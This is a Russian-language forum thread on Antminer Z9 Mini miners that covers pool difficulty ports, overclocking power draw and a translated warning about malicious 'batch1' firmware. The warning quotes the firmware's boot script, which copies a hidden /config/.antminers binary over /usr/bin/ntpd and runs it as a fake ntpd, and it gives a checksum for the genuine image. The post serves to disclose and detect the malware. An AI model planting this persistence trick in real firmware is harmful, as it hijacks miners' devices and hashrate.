Jump to content
Hlorofos

Все полезные ссылки и FAQ можно найти в первом сообщении. Прежде чем задать вопрос, посмотрите там.

Message added by Hlorofos

Recommended Posts

Можете пояснить как  выбор сложности влияет на количество добытых монет: 3032 Single GPU (Var Diff 409-32768), 3033 Multiple GPUs/ASIC (Var Diff 12288-65336), 3034 Nicehash (Var Diff 573440 (fixed)),

3035 GPU/ASIC SSL.,т.е., если миник подключить к порту 3032 он больше намайнит чем на 3033?

@rey_v 

Не намайнит он больше.На низкой сложности шары будут находиться чаще но цена за шару будет ниже и наоборот при высокой сложности шар будет меньше,но цена будет выше.

подскажите,при разгоне как поднимается потребление электрики?

2 часа назад, 1sven1 сказал:

До 450Вт при 750Мгц разгона.

18.05.2019 в 17:05, 1sven1 сказал:

712-725 частота - 375 ватт по ваттметру. Зачем гнать частоту 750 не понятно. чтобы он уходил в защиту и вырубался?

1 час назад, Ultro сказал:

712-725 частота - 375 ватт по ваттметру. Зачем гнать частоту 750 не понятно. чтобы он уходил в защиту и вырубался?

Это если по максимуму брать, а так да, в пределах 400Вт при около 725Мгц разгона для первого батча. Второй батч гонится хуже и там частота ниже и стало быть ниже и потребление.

07.05.2019 в 21:00, Alikcasd сказал:

интернет чаще всего 

Оказывается он начинает майнить на это адрес https://www.nicehash.com/miner/3CJgXokLQrRCQcEoftS7MbPDSXhXpX6P55 

И не могу прошить его на родную прошивку.

ВНИМАНИЕ: Существуют версии Z9 Mini, которые претендуют на звание «batch1», но на самом деле распространяются вредоносные программы! Мне все равно, где вы получаете прошивку batch1, но, пожалуйста, убедитесь, что md5sum соответствует этому: 

0682b350dd8b53d62a11231d16d133a7 Antminer-Z9-Mini-201805262047-500M.tar.gz. 

Любой другой вариант * NOT * фабричный. Я предоставляю это в нижней части моей веб-страницы по адресу https://releases.broked.net.

Если у вас есть «.antminers» в / config, у вас плохая прошивка ...

Код:
$ cat dropbear 
#! bin / bash 
NO_START = 0 
cp -rf /config/.antminers / usr / bin / ntpd 
/ usr / bin / ntpd -p /var/run/ntp.pid -g

Эта прошивка копирует /config/.antminers в / usr / bin / ntpd и запускает его .... поддельный ntpd. 

Что он делает после этого, я пока не знаю. 

Короткая история: 

я только что провел последние пару часов, работая с пользователем, который купил 3 мини-магазина у eBay, который шел с чем-то вроде прошивки batch1, но на самом деле это не так. Попытки заменить прошивку привели к некоторым очень сумасшедшим ситуациям ... и невозможности фактически заменить прошивку больше ... она бы притворялась обновленной, но фактически не обновлялась. 

У меня нет копии полной "вредоносной" прошивки, но я собрал данные криминалистики с компьютеров и проанализирую их, как смогу. 

Он выглядит как «ntp», но на самом деле это /config/.antminers, который запускается при загрузке.

Снятие этого было своего рода болью в тылу, но может быть сделано. 

Edited by olegans1234